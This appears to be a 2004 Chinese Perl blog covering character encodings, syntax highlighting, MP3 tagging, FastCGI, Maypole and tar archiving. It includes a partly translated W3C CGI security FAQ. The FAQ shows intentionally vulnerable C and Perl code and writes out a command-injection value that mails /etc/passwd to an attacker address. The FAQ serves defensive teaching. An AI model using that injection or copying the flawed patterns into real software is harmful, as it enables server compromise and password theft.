汉字编码笔记

23 November 2004


坦白说,以下的东西我不是很懂。只是在做实验。这份就类似于实验纪录。

ord,unpack("*H",hex,chr

my $c = "我";

print unpack("H*",$c); # 输出 ced2, 此为汉字编码\xcede
print ord("$c")"; # 输出 206
print hex(substr(unpack("H*",$c),0,2)); # 输出 206, hex("ce") = 206
print chr(0xce),chr(0xd2); # 输出“我”,chr(0xced2)输出的字为“旎”。原因不可考。

汉字编码范围

参考文章:http://www.douzi.org/weblog/archives/2004_03.html
编码第一字节第二字节第三字节第四字节
GB23120xB0-0xF70xA0-0xFE
GBK0x81-0xFE0x40-0xFE
GB18030的双字节0x81-0xFE0x40-0x7E, 0x80-0xFE
GB18030的四字节0x81-0xFE0x30-0x390x81-0xFE0x30-0x39
一般来说,需要支持的是GBK,而GB18030的双字节与GBK仅差一条线,XX7F。所以一般的汉字匹配为
$chinese =~ /^[\x8140-\xFEFE]+$/;
这里所匹配的不是全是汉字,还包括非汉字符号,还有用户自定义字符区。
这东西真不是一般麻烦。

常见的两个空白字的过滤

一个字“ ”是中文简体输入法在全角格式下的空格,编码为a1a1。
另一个字“”不知道怎么输入的?可能是繁体输入法的,编码为aba7。
其实还有一大段区域属于用户自定义区域,此区域内的字在网页上显示都为占两字节的空格。一般用户名的注册是需要过滤这些空格的。这范围我还没找到。
$text =~ s/ //g;
$text =~ s///g;
#或者使用如下的过滤
$text =~ s/(\xa1\xa1)|(\xab\xa7)//g;

如何将Perl代码着色

20 November 2004


先决条件

cpan Syntax::Highlight::Perl

代码解释

perldoc Syntax::Highlight::Perl
perldoc里或许解释清楚了,但是蛮长了,我没耐心看。使用里面的代码一点反应都没有。
use Syntax::Highlight::Perl;

my $formatter = new Syntax::Highlight::Perl;
print $formatter->format_string($my_string);
不想仔细看完全文,最主要是我懒,看英文头痛得很。
还好可以Search, 找到了Coloring perl code in HTML
对着那代码,改写了些许颜色。将它span里改写成使用class而不是style.这样比较容易知道哪些词是属于哪一部分。
完成后的代码如下。现炒现卖,直接将它着色。
打算迟些时候将它做为Eplanet的新功能。

highlightperl.css - 此CSS文档可随意更改。

.vs { color:#080; }
.va { color:#f70; }
.vh { color:#80f; }
.vt { color:#f03; }
.sub { color:#980; }
.qr { color:#ff8000; }
.str { color:#000; }
.cm { color:#008080;font-style:italic; }
.cmp { color:#014;font-family: garamond,serif;font-size:11pt; }
.bw { color:#3A3; }
.pk { color:#900; }
.nb { color:#f0f; }
.op { color:#000; }
.sym { color:#000; }
.kw { color:#00f; }
.bo { color:#f00; }
.bf { color:#001; }
.char { color:#800; }
.dr { color:#399;font-style:italic; }
.lb { color:#939;font-style:italic; }
.ln { color:#000; }
highlight.pl
#!/usr/bin/perl -T
use strict;
use warnings;
use CGI::Carp qw(fatalsToBrowser);
use CGI qw/:standard/;

my $cgi = new CGI;
print $cgi->header;

use Syntax::Highlight::Perl;

my $color_table = {
    'Variable_Scalar'   => 'vs',
    'Variable_Array'    => 'va',
    'Variable_Hash'     => 'vh',
    'Variable_Typeglob' => 'vt',
    'Subroutine'        => 'sub',
    'Quote'             => 'qr',
    'String'            => 'str',
    'Comment_Normal'    => 'cm',
    'Comment_POD'       => 'cmp',
    'Bareword'          => 'bw',
    'Package'           => 'pk',
    'Number'            => 'nb',
    'Operator'          => 'op',
    'Symbol'            => 'sym',
    'Keyword'           => 'kw',
    'Builtin_Operator'  => 'bo',
    'Builtin_Function'  => 'bf',
    'Character'         => 'char',
    'Directive'         => 'dr',
    'Label'             => 'lb',
    'Line'              => 'ln',
};

my $formatter = Syntax::Highlight::Perl->new();

$formatter->define_substitution('<' => '<', 
                                '>' => '>', 
                                '&' => '&'); # HTML escapes.

# install the formats set up above
while ( my ( $type, $class ) = each %{$color_table} ) {
	$formatter->set_format($type, [ qq~<span class=\"$class\">~, '</span>' ] );
}

print qq~<link rel="stylesheet" href="highlightperl.css" type="text/css" />~;
print '<pre>';
while (<DATA>) {
    print $formatter->format_string;
}
print "</pre>";

如何设置mp3文件的ID3v1Tag

17 November 2004


Task

从网上download了一些歌曲,回来用foobar2000放。发现没有显示其歌曲名和歌手名。
因为迷你歌词/MiniLyrics查找配对歌词要通过mp3的歌曲名和歌手名。一个个修改太麻烦了。就想着用perl写个批量修改。

Code

cpan search了下,install MP3::ID3v1Tag
此模块perldoc说的很清楚,我也就照本宣科写了个代码。
其中获得artist,title,ablum的过程不通用。各位自己去parse
#!/usr/bin/perl
# usage: set one directory mp3's ID3v1Tag, such as artist, title, ablum
use MP3::ID3v1Tag;

my $dir = "E:/Music/Santana_Shaman";
opendir(DIR,"$dir");
my @data = readdir(DIR);
closedir(DIR);
@data = grep(/\.mp3$/, @data);

foreach $mp3 (@data) {
	my $mp3_file = new MP3::ID3v1Tag("$dir/$mp3");
	#if($mp3_file->got_tag()) {
		# it's special,here the file name like "Santana Shaman 11 Feels Like Fire Feat DIDO.mp3"
		# u parse file name and got the artist&album&title&..
		my ($artist, $album, undef, $title) = ($mp3 =~ /^([a-zA-Z]+)\s+([a-zA-Z]+)\s+([0-9]+)\s+(.*?)\.mp3$/);
		print "$artist, $album, $title\n";
		#end
		$mp3_file->set_title("$title");
		$mp3_file->set_artist("$artist");
		$mp3_file->set_album("$album");
		#$mp3_file->set_year(2002);
		#$mp3_file->set_genre("Latin-Rock");
		$mp3_file->save() or warn "failed to save $mp3";
  #}
}

如何安装FastCGI

15 November 2004


Intro

此文并非介绍FastCGI的好处,只是简单的介绍我的一次安装过程。
我的Env为 Win2000+SP4, Apache/2.0.50 (Win32) mod_perl/1.99_15-dev Perl/v5.8.4 mod_ssl/2.0.50 OpenSSL/0.9.7d PHP/4.3.7
$Apache_dir = "C:/Apache2"; $Perl_dir = "C:/usr";

Step by step

  1. http://www.fastcgi.com/dist/ 下载mod_fastcgi-2.4.2-AP20.dll(如果是Apache版本为1.3,下载mod_fastcgi-2.4.2-AP13.dll)。
  2. 遵从http://www.fastcgi.com/mod_fastcgi/INSTALL最下面的一段话:
    To install mod_fastcgi (built above or retrieved from 
    http://fastcgi.com/dist/):
    
      1. Copy the mod_fastcgi.dll to the Apache modules directory 
         (e.g. C:\Apache\modules)
    
      2. Edit the httpd configurion file (e.g. C:\Apache\conf\httpd.conf)
         and add a line like:
    
         LoadModule fastcgi_module modules/mod_fastcgi.dll
    
         Note that if there's a ClearModuleList directive after new entry,
         you'll have to either move the LoadModule after the ClearModuleList
         or add (have a look at how the other modules are handled):
    
         AddModule mod_fastcgi.c
    
      3. Edit the httpd configuration file(s) to enable your FastCGI
         application(s).  See docs/mod_fastcgi.html for details.
    
    简单翻译为
      1. 拷贝 mod_fastcgi.dll(我们下来的mod_fastcgi-2.4.2-AP*.dll,将其改名) 至Apache modules(模块)目录
         (如 C:\Apache\modules)
    
      2. 编辑httpd配置文件 (如 C:\Apache\conf\httpd.conf)
         然后增加如下一行:
    
         LoadModule fastcgi_module modules/mod_fastcgi.dll
    
         注意如果在此句以后出现 ClearModuleList 指示/directive,你必须要么移动LoadModule到ClearModuleList下面或增加(参考其他handled模块):
    
         AddModule mod_fastcgi.c
    
      3. 编辑httpd配置文件去启动你的FastCGI程序。更详细的请参考 docs/mod_fastcgi.html
    
  3. visit http://www.fastcgi.com/mod_fastcgi/docs/mod_fastcgi.html, 参考此文档在httpd.conf里增加:
    
    <Directory "E:/Fayland/fcgi-bin">
    	SetHandler fastcgi-script
    	AddHandler fastcgi-script fcg fcgi fpl
    	Options +ExecCGI
    </Directory>
    
  4. 不要下载FCGI.pm-0.64-win32-x86.zip,可以cpan或ppm FCGI安装FCGI.pm和相关文件。
  5. 测试代码:(E:\Fayland\fcgi-bin\test.fpl)
    #!/usr/bin/perl
    use FCGI;
    use strict;
    
    my $count = 0;
    my $request = FCGI::Request();
    
    while($request->Accept() >= 0) {
    	$count++;
    	print "Content-type:text/html\n\n";
    	print "total request $count";
    }
    
    visit: http://localhost/fcgi-bin/test.fpl.

Refer


WWW Security FAQ: CGI Scripts

10 November 2004


原文URL: http://www.w3.org/Security/Faq/wwwsf4.html

免责申明

此文档信息由 Lincoln Stein ([email protected]) and John Stewart ([email protected]) 提供。(W3C)保留此文档仅作为对网络社区的一项服务,对此内容不负任何责任。需要更多的信息帮助,请直接联系 Lincoln Stein or John Stewart。

Q1: CGI脚本的问题?

CGI脚本的问题在于提供了入侵漏洞的机会。编写CGI脚本时应该给予处理服务器同样的细心与注意力,因为事实上它们就是小型服务器。不幸地是对于大多数网站所有人来说,在网络编程方面他们都是初次碰到CGI脚本。

CGI脚本能引发安全漏洞的两种情况:

  1. 有意或无意地泄漏主机系统的信息,致使方便黑客入侵。
  2. 脚本在处理远程用户输入时,例如表单/form的内容或“可搜索索引”命令,及易受到远程用户通过故意输入可执行命令的攻击。

即使你以"nobody"身份运行服务器,CGI脚本也可能成为安全漏洞。一个蓄意破坏的CGI脚本当你以"nobody"运行时仍有足够的权限通过邮件发送系统密码文件,检查网络信息图或在一个高数字端口号上启动登陆会话(这只需要用Perl运行少许命令就可获得)。即使你的服务器运行在一个chroot目录下,一个漏洞百出的程序也能泄露足够多的系统信息来危及主机的安全。

Q2: 比较将CGI脚本放于文档树任何目录下然后服务器识别.cgi扩展名的运行,将它们都放在cgi-bin目录下是否更好一些?

尽管将CGI脚本散放到文档树没有任何固有的危险,但是将它们放到cgi-bin目录下会更好一些。因为CGI脚本是如此大的潜在安全漏洞,将它们放到一起比散放到多个目录下更容易知道系统上已经安装了什么脚本。 这种优点在一个环境里有多个网站所有人时更明显。某个所有者不小心创建某个充满漏洞的脚本然后安装在文档树的某处很容易就发生。通过将CGI脚本限制在cgi-bin目录里和设置权限为只有网站管理员才能安装这些脚本,你就能避免这种混乱。

还有种风险是黑客设法在文档树某处创建了个.cgi文件,然后通过远程请求这个URL地址来运行它。严密控制读写权限的cgi-bin目录能减少这类事的发生。

Q3: 编译型语言如C是否比解释型语言如Perl和shell脚本安全?

答案为是,但是要附带许多条件和解释。

首先是远程用户获得脚本源代码的问题。黑客对脚本是如何运行知道得越多,他就越容易找到漏洞来入侵。当一个脚本用编译型语言如C所写,你可以将它编译成二进制,放于cgi-bin,你就不用担心入侵者能获得源代码。但是对于解释型脚本,源代码总是有机会获得的。即使一个正确配置的服务器永远不会将源代码返回给可执行脚本,但是仍然有许多情况下可以跳过这限制。

考虑如下情况。为了方便,你决定让服务器通过辨别.cgi扩展名来判断是否CGI脚本。稍后,你需要对一个解释型CGI脚本做个细小的变动。你用Emacs文本编辑器打开然后进行修改。 不幸的是编辑器在文档树的某处留下了脚本源代码的备份复制品。虽然远程用户不能通过获取脚本本身来得到源代码,但他现在能通过猜测请求某URL来获得备份复制品:

        http://your-site/a/path/your_script.cgi~
(这是另一个好的理由去限制CGI脚本到cgi-bin目录和保证cgi-bin与网站文档根目录是分开的。)

当然在很多情况下用C写的CGI脚本源代码在Web上是自由发布的,黑客偷取源代码的能力不是一个问题。

另一个编译型代码优于解释型代码的原因是大小和复杂性问题。大的软件程序,例如shell和Perl解释器,很有可能存在漏洞。某些漏洞可能是安全漏洞。它们在那,只是我们不知道它们是什么。

第三个需要考虑的是脚本语言非常容易发送数据到系统命令并且捕获输出。如下所示,在脚本里调用系统命令是一个主要的潜在安全漏洞。在C里调用系统命令比较费劲,所以程序员更少去做这些。特别需要说明的是,不管复杂程序如何,写一个能避免危险结构的shell脚本是非常非常困难的。Shell脚本除了写些小CGI程序,最好不要用它。

我上面所说的,请不要理解成我担保编译型很安全。C程序也有许多可入侵漏洞,如 NCSA httpd 1.3 和 sendmail 的经历所示。平衡解释型脚本问题可以试着将它们编写的小一点,如此可以让作者外的其他人更容易懂些。此外,Perl包括某些内置特性能捕获潜在的安全漏洞。例如检查感染/taint(参考下面)能捕获大多数CGI脚本里的普通缺陷,这能使Perl脚本在某种程度上与等同的C程序更安全。

Q4: 我在Web上发现一个好CGI脚本,我想安装它。那我该如何知道它是否是安全的?

你永远不能确保一个脚本是安全的。你所能做的最好的方法是仔细检查并且明白它在做什么和它是怎么做的。如果你不懂这脚本所写的语言,那么给懂它的其他人看看。

当你检查脚本时所需要考虑的:

  1. 它有多复杂?它越长就越容易出现问题。
  2. 它是否在主机系统上读写文件?读文件的程序可能违反你所设置的权限约束,或泄露系统信息给黑客。写文件的程序可能会修改和破坏文档,或更糟糕的,给系统引入某木马。
  3. 它是否与系统的其他程序交互?例如,许多CGI脚本回复表单输入时是通过建立sendmail程序的通道来发送e-mail的。它完成此事的方式是否安全?
  4. 它是否在 suid (set-user-id) 权限下运行?通常来说这是件非常危险的事,脚本要有非常足够的理由来做此事。
  5. 作者是否检查了用户的所有表单输入?检查表单输入是作者有考虑安全问题的一个信号。
  6. 作者是否使用直接的路径名来调用外部程序?依赖PATH环境变量来解决部分路径名是件危险的事。

Q5: 哪些CGI脚本己知存在系统漏洞?

很大一部分广为发布的CGI脚本都存在已知漏洞。这里所列的大部分漏洞已经被捕获和修正,但如果你运行的是这些脚本的旧版本,那你仍然是易受攻击的。删除它然后获得最新的版本。如果该脚本没有任何修正,那就不要使用它。
HotMail
该CGI脚本运行了流行的Hotmail e-mail系统,一个缺陷安全系统能使未被授权的个人进入他人的e-mail帐号和阅读他们的邮件。该问题已知影响了1998年十二月的Hotmail版本。需要更多的信息,请参考如下链接:

Matt Wright's 文本计数器/TextCounter 版本 1.0-1.2 (Perl) 和 1.0-1.3 (C++) (June 1998)
该文本计数器的早期版本,用于在页面上显示该页被点击数,未能在用户提供的输入中移除shell字符。该漏洞的结果能使远程用户在服务器主机上运行shell命令。影响包括Perl和C++版本。请升级到版本 1.21 (Perl) 或 version 1.31 (C++):

各种留言本脚本(June 1998)
那时候有持续的漏洞报道,涉及了各种各样的留言本脚本。首先被确认的是 Selena Sol 留言本,但是也影响了其他脚本。这些漏洞利用了脚本没有从用户输入中过滤掉HTML标签,所以可以在目录下将ssi(server-side includes)写入留言本文件。留言本脚本应当过滤掉HTML标签或者将<>替换为字符实体 & gt; and & lt;(当中无空格)。这些被写入的文件应该置于允许运行ssi,asp,php或其他HTML模版的目录中。关于此问题的详细描述请参考 Selena Sol/Extropia 存档 http://www.extropia.com/

Excite Web Search Engine (EWS) version (November 1998)
The Excite Web Search engine stores critical security information (including the encrypted administrative password) in world writable files. This allows unprivileged local users to gain access to the EWS administrative front end on both Unix and NT systems.

Note that this bug only endangers your Web site if you have the search engine installed locally. It does not affect sites that link to Excite.com's search pages, or sites that are indexed by the Excite robot.

A worse problem is found in unpatched versions of EWS earlier than Feburary 1998 (unfortunately, also called version 1.1). This bug involves the failure to check user-supplied parameters before passing them to the shell, allowing remote users to execute shell commands on the server host. The commands will be executed with the privileges of the Web server.

See http://www.excite.com/navigate/patches.html for more information and patches.

info2www, versions 1.0-1.1
info2www, which converts GNU "info" files into Web pages, fails to check user-provided filenames before opening them. As a result, it can be tricked into opening system files or executing commands containing shell metacharacters. Versions 1.2 and higher are reported to be free of the problem, but due to the many extant versions of this script, you should probably examine the source code yourself before installing it. Also scrutinize the CGI scripts info2html and infogate, which are apparently based on info2www.

Count.cgi, versions 1.0-2.3
Count.cgi, widely used to produce page hit counts, contains a stack overflow bug that allows malicious remote users to execute Unix commands on the server by sending the script carefully crafted query strings. Version 2.4 corrects this bug. It can be found at http://www.fccc.edu/users/muquit/Count.html.

webdist.cgi, part of IRIX Mindshare Out Box versions 1.0-1.2
This script is part of a system that allows users to install and distribute software across the network. Due to inadequate checking of CGI parameters, remote users can execute commands on the server system with the permissions of the server daemon.
This bug has not been fixed as of June 12, 1997. Contact Mindshare for patches/workarounds. Until your copy of webdist.cgi is fixed, disable it by removing its execute permissions.

php.cgi, multiple versions
The php.cgi script, which provides an HTML-embedded programming language embedded in HTML pages, database access, and other nice features, should never be installed in the scripts (cgi-bin) directory. This allows anyone on the Internet to run shell commands on the Web server host machine. In addition, versions through 2.0b11 contain known security holes. Be sure to update to the most recent version and check the PHP site (see URL below) for other security-related news. The Apache module version of PHP, since it does not run as a CGI script, is said not contain these holes. Nevertheless, you are encouraged to keep your system current.
http://php.iquest.net/

files.pl, part of Novell WebServer Examples Toolkit v.2
Due to a failure to check user input, the files.pl example CGI script that comes with the Novell WebServer installation allows users to view any file or directory on your system, compromising confidentail documents, and potentially giving crackers the information they need to break into your system. Remove this script, and any other CGI scripts (examples or otherwise) that you do not need.

Microsoft FrontPage Extensions, versions 1.0-1.1
Under certain circumstances, unauthorized users can vandalize authorized users' files by appending to them or overwriting them. On a system with server-side includes enabled, remote users may be able to exploit this bug to execute commands on the server.
http://www.microsoft.com/security/bulletins/

nph-test-cgi, all versions
This script, included in many versions of the NCSA httpd and apache daemons, can be exploited by remote users to obtain a file listing of any directory on the Web server. It should be removed or disabled (by removing execute permissions).

nph-publish, versions 1.0-1.1
Under certain circumstances, remote users can clobber world-writable files on the server.
http://www.genome.wi.mit.edu/~lstein/server_publish/nph-publish.txt

AnyForm, version 1.0
Remote users can execute commands on the server.
http://www.uky.edu/~johnr/AnyForm2

FormMail, version 1.0
Remote users can execute commands on the server.
http://alpha.pr1.k12.co.us/~mattw/scripts.html

"phf" phone book script, distributed with NCSA httpd and Apache, all versions
Remote users can execute commands on the server.
http://hoohoo.ncsa.uiuc.edu/

To my eternal chagrin, one of the buggy CGI scripts to be discovered is in nph-publish, a script that I wrote myself to allow HTML documents to be "published" to the Apache web server from a publish-savvy editor such as Netscape Navigator Gold. I didn't check user-provided pathnames correctly, potentially allowing the script to write files into places where they aren't allowed. If the server is run with too many privileges, this can cause big problems. If you use this script, please upgrade to version 1.2 or higher. The bug was discovered by Randal Schwartz ([email protected]).

The holes in the second two scripts on the list were discovered by Paul Phillips ([email protected]), who also wrote the CGI security FAQ. The hole in the PHF (phone book) script was discovered by Jennifer Myers ([email protected]), and is representative of a potential security hole in all CGI scripts that use NCSA's util.c library. Here's a patch to fix the problem in util.c.

Reports of other buggy scripts will be posted here on an intermittent basis.

In addition, one of the scripts given as an example of "good CGI scripting" in the published book "Build a Web Site" by net.Genesis and Devra Hall contains the classic error of passing an unchecked user variable to the shell. The script in question is in Section 11.4, "Basic Search Script Using Grep", page 443. Other scripts in this book may contain similar security holes.

This list is far from complete. No centralized authority is monitoring all the CGI scripts that are released to the public; the CERT does issue alerts about buggy CGI scripts when it learns about them, and it's a good idea to subscribe to their mailing list, or to browse the alert archive from time to time (see the bibliography).

Q6: I'm developing custom CGI scripts. What unsafe practices should I avoid?

  1. Avoid giving out too much information about your site and server host.

    Although they can be used to create neat effects, scripts that leak system information are to be avoided. For example, the "finger" command often prints out the physical path to the fingered user's home directory and scripts that invoke finger leak this information (you really should disable the finger daemon entirely, preferably by removing it). The w command gives information about what programs local users are using. The ps command, in all its shapes and forms, gives would-be intruders valuable information on what daemons are running on your system.

  2. If you're coding in a compiled language like C, avoid making assumptions about the size of user input.

    A MAJOR source of security holes has been coding practices that allowed character buffers to overflow when reading in user input. Here's a simple example of the problem:

    
       #include <stdlib.h>
       #include <stdio.h>
       static char query_string[1024];
    
       char* read_POST() {
          int query_size;
          query_size=atoi(getenv("CONTENT_LENGTH"));
          fread(query_string,query_size,1,stdin);
          return query_string;
       }
    
    The problem here is that the author has made the assumption that user input provided by a POST request will never exceed the size of the static input buffer, 1024 bytes in this example. This is not good. A wily hacker can break this type of program by providing input many times that size. The buffer overflows and crashes the program; in some circumstances the crash can be exploited by the hacker to execute commands remotely.

    Here's a simple version of the read_POST() function that avoids this problem by allocating the buffer dynamically. If there isn't enough memory to hold the input, it returns NULL:

       char* read_POST() {
          int query_size=atoi(getenv("CONTENT_LENGTH"));
          char* query_string = (char*) malloc(query_size);
          if (query_string != NULL)
             fread(query_string,query_size,1,stdin);
          return query_string;
       }
    
    Of course, once you've read in the data, you should continue to make sure your buffers don't overflow. Watch out for strcpy(), strcat() and other string functions that blindly copy strings until they reach the end. Use the strncpy() and strncat() calls instead.
       #define MAXSTRINGLENGTH 255
       char myString[MAXSTRINGLENGTH + sizeof('\0')];
       char* query = read_POST();
       assert(query != NULL);
       strncpy(myString,query,MAXSTRINGLENGTH);
       myString[MAXSTRINGLENGTH]='\0';      /* ensure string terminator */
    
    (Note that the semantics of strncpy are nasty when the input string is exactly MAXSTRINGLENGTH bytes long, leading to some necessary fiddling with the terminating NULL.)
  3. Never, never, never pass unchecked remote user input to a shell command.

    In C this includes the popen(), and system() commands, all of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands.

    Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous.

    The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.

       $mail_to = &get_name_from_input; # read the address from form
       open (MAIL,"| /usr/lib/sendmail $mail_to");
       print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";
       close MAIL;
    
    The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address. But what if the wiley hacker passes an e-mail address that looks like this?
    
         [email protected];mail [email protected]</etc/passwd;
    
    Now the open() statement will evaluate the following command:
    
    /usr/lib/sendmail [email protected]; mail [email protected]</etc/passwd
    
    Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack.

Ultimately it's up to you to examine each script and make sure that it's not doing anything unsafe.


$Id: wwwsf4.html,v 1.11 2003/02/23 22:46:27 lstein Exp $

utf8与gb2312编码

09 November 2004


    问题:
  1. 将gb2312数据格式的文件转为utf8格式
  2. 在utf8编码下显示gb2312数据文件
  3. 如何直接生成utf8格式的数据文件
  4. 不涉及文件读取,script文件里print "中文";
其实最主要的一句为:
use Encode qw/encode decode/;
my $utf_data = encode("utf8", decode("gb2312", $data));
# $data为gb2312格式, $utf_data为utf8格式
等同的代码还有:
use Encode qw/from_to/;
from_to($data, "gb2312", "utf8");
# $data从gb2312格式转为utf8格式
相反从utf8转为gb2312也成。encode,decode里的参数互换下。

例子与代码:
gb.dat是gb2312数据格式的文件。在-charset=>'utf-8'时显示乱码,gb2312时正常。


#!/usr/bin/perl
use strict;
use CGI::Carp qw(fatalsToBrowser);
use CGI qw/:standard/;
use Encode qw/encode decode from_to/;

my $cgi = new CGI;
# charset utf8
print $cgi->header(-type=>'text/html',-charset=>'utf-8');

# open the gb2312 file
open(FH, "gb.dat");
my $data = <FH>;
close(FH);

# convert gb2312 to utf8
my $utf_data = encode("utf8", decode("gb2312", $data));

# produce the utf8 file
open(FH, ">utf8.dat");
print FH $utf_data;
close(FH);

my $word = "我是中国人";
from_to($word, "gb2312", "utf8");

print "$utf_data, $word";
经过转换后,以后在-charset=>'utf-8'下直接读取utf8.dat而不用再次decode/encode.

不涉及文件读取,script文件里print "中文";

在script.pl里use encoding "euc-cn", STDOUT => "utf8";
use CGI qw/:standard/;
use encoding "euc-cn", STDOUT => "utf8";

my $cgi = new CGI;
print $cgi->header(-type=>'text/html',-charset=>'utf-8');

print "我是中国人,我爱野文";

Refer


Maypole

31 October 2004


OS: Win2000 SP4
Apache: C:\Apache2
Perl: C:\usr
使用的是Perl-5.8-win32-bin.exe.
Apache/2.0.50 (Win32) mod_perl/1.99_15-dev Perl/v5.8.4

先cmd, cpan Maypole
经过一系列的prerequisite的模块安装。一切都很顺利。
然后拷贝.cpan/build/Maypole-2.04/ex/BeerDB.pm to C:/usr/site/lib.
编辑conf/perl.conf, 在其后增加
# Maypole
Alias /beerdb/ "E:/Fayland/beerdb/"
<Location /beerdb>
  SetHandler perl-script
  PerlHandler BeerDB
</Location>
首先编辑BeerDB.pm, 更改它的数据库地址。
BeerDB->setup("dbi:mysql:beerdb","user","pass");
将C:\.cpan\build\Maypole-2.04\templates下的模板文件移到beerdb目录下。
其中有点特别的是maypole.css要移到和beerdb同级目录下。
参考使用 Maypole 构建 Web 应用程序增加了数据库Table结构。
访问http://localhost/beerdb/就大致完成操作。其他的改天继续研究。

TroubleShooting

  • Access denied for user: '@localhost' to database 'beerdb'?
    例如是mysql的话
    BeerDB->setup("dbi:mysql:beerdb");
    在其后增加user/pass.
    BeerDB->setup("dbi:mysql:beerdb","user","pass");
  • Can't locate object method "set_db" via package "BeerDB::Beer"?
    我在Win2000下使用mysql时出现这问题,经过Search发现是Class::DBI::mysql的问题,重装此模块总是出错。后来装了mysql4的最新版得以解决。
Refer


Win32下的进程模块

30 October 2004


我的任务很简单,启动一个程序(c:\a.exe),然后过1分种终止进程,然后再启动,如此循环/loop.

Win32::Process我没用过,也是第一次用,其中什么子进程之类的也不太懂。详细的请查阅perldoc Win32::Process.
如下是我的代码,给需要完成相似任务的朋友做参考:

use Win32::Process;

while (1) {
    my ($ProcessObj, $exitcode);
    Win32::Process::Create($ProcessObj,
        "c:\\a.exe",
        "",
        0,
        NORMAL_PRIORITY_CLASS,
        ".")|| die ErrorReport();

    $ProcessObj->GetExitCode( $exitcode );
    sleep 60;
    my $pid = $ProcessObj->GetProcessID();
    Win32::Process::KillProcess($pid, $exitcode);
    sleep 1;
}

Perl in Win32

30 October 2004


描述

此文描述了Perl在Win32下的特殊点,包括
  • 最简安装Perl方案
  • Q1: 执行 C:\>perl 出现“'perl'不是内部或外部命令,也不是可运行的程序或批处理文件”错误?
  • 在 C:\> 中使用perl写小程序?
  • Nmake
  • 在Win32下安装Unix常用工具tar,gzip,make?
  • 我在 cpan Clone 时提示“cl 不是内部或外部程序”?

最简安装Perl方案

http://www.apache.org/dyn/closer.cgi/perl/win32-bin/Perl-5.8-win32-bin/,下载Perl-5.8-win32-bin.exe即可。
此二进制文件包含最新Apache,Perl和最合适的mod_perl,mod_ssl / OpenSSL,并且有php。
如2004/7月的为:Apache/2.0.50 (Win32) mod_perl/1.99_15-dev Perl/v5.8.4 mod_ssl/2.0.50 OpenSSL/0.9.7d PHP/4.3.7

Q1: 执行 C:\>perl 出现“'perl'不是内部或外部命令,也不是可运行的程序或批处理文件”错误?

A1: 假设您的Perl安装目录为C:\usr,您的win为2000(其他版本的大致操作一样)。您需要在环境变量的Path中加入";C:\usr\bin"后方能正常使用。
步骤如下:在“我的电脑”点右键选取“属性”,在“高级”项中点击“环境变量(E)...”,在弹出的窗口下方“系统变量”中的Path上编辑,在变量值里加入";C:\usr\bin"。

在 C:\> 中使用perl写小程序?

C:\>perl
print "hello world";
^Z
hello world
C:\>
其中^Z为按下Ctrl+Z,此为结束代码。

Nmake

Nmake在Win32中的作用类似于(L)Unix下的make。许多Perl Script安装的时候都用得着。
Perl安装目录中下的bin目录中,有一文件为get_nmake.bat,此文件通过LWP获得Nmake15.exe
文件的位置于 http://download.microsoft.com/download/vc15/Patch/1.52/W95/EN-US/Nmake15.exe

在Win32下安装Unix常用工具tar,gzip,make?

大概是由于Perl是Unix下的产物有关,所以有关Perl的东西会经常用到Unix下的常用工具如tar/gzip/make等。
最近因为想发布个模块Lingua::Han2PinYin, 上传模块到CPAN前要tar/gzip模块。而Win32下是没有这两个工具的。

解决方案为CygWin
, Cygwin是在Win32上运行的仿Linux环境的一个软件。 Cygwin的安装是非常简单的,首先去cgywin主页去下载setup.exe文件。下载完成后打开,按照操作下一步进行安装。因为只需要用到tar/gzip所以选择东西时,先将所有去掉(在All那点几下)再安装Base部分(里面有tar/gzip)和部分Devel(里面有make)。
我是不太推荐安装X11的,图形界面在我的机子上运行起来比在VMware下还要慢。另外的东西各位可以自己看看选择安装。
如果安装出现问题,可以BaiduGoogle下。有很多安装文档可以参考。

我在 cpan Clone 时提示“cl 不是内部或外部程序”?

请安装 Microsoft Visual C++ 6.0.

Tar

30 October 2004


用Tar压缩文件

  1. 一个简单的Archive::Tar例子:
    my $tar = Archive::Tar->new();
    my @file = ("1.cgi", "2.txt");
    $tar->add_files(@file);
    $tar->write("$dir/$name.tar");# $dir 为要保存的目录路径,$name 为文件名
    
  2. 如果1.cgi,2.txt不在程序目录下那必须增加如下代码与$tar->add_files前
    chdir "$targetdir";#转到文件所在目录,在此之前须在程序最前面增加 use Cwd;
    
  3. 关于@file
    如果@file中的元素包含了路径,那生成的$name.tar文件解压缩后根据路径生成文件夹来包含该元素的文件。

  4. 我写的获得某一目录下所有文件,和子目录加文件
    sub GetDir {
    	my ($dir, $file_ref, $subdir) = @_;
    	if (($subdir ne "") && ($subdir !~ /\/$/)) { $subdir = "$subdir/"; }
    	opendir (DIRS, "$dir");
    	my @dirdata = readdir(DIRS);
    	closedir (DIRS);
    	foreach (@dirdata) {
    		next if (/^\.+$/);
    		if (-d "$dir/$_") {
    			&GetDir("$dir/$_", $file_ref, "$subdir$_");
    		} else {
    			push (@$file_ref, "$subdir$_");
    		}
    	}
    }
    
  5. 一个完整例子
    #!/usr/bin/perl
    # By 非四(Fayland) @ http://www.1313s.com/
    use CGI::Carp qw(fatalsToBrowser);
    use Archive::Tar;
    use Cwd;
    $|++;
    #两个参数,第一个为打包的目录绝对路径,第二为tar文件的保存绝对路径
    my $tar = Archive::Tar->new();
    my ($target, $savefile) [email protected]_;
    my @file;
    GetDir("$target", \@file);
    chdir "$target";
    $tar->add_files(@file);
    $tar->write("$savefile");
    

用Tar解压缩

use Archive::Tar;
use Cwd;
my $tar = Archive::Tar->new();
$tar->read("$from_dir/$target.tar"); # tar 文件的绝对路径地址
my @files = $tar->list_files();
#&createdir("$to_dir"); # 如果目标文件夹不存在,则创建
chdir $to_dir;
$tar->extract(@files, $to_dir);

个人经历

因为是虚拟空间,所以经常要搬来搬去的。如果一个个文件弄回本地机子再传上去感觉速度很慢。
就我目前的空间就占用了大概700多M,万把个文件。而且Linux虚拟主机传上去还要chmod为666才能被程序修改。
没办法,唯一的好选择就是用Tar然后unTar。速度很快而且不用chmod。
更详细的应用代码可以在NiBoard的cgi-bin/admin/tar.pl和untar.pl里找到。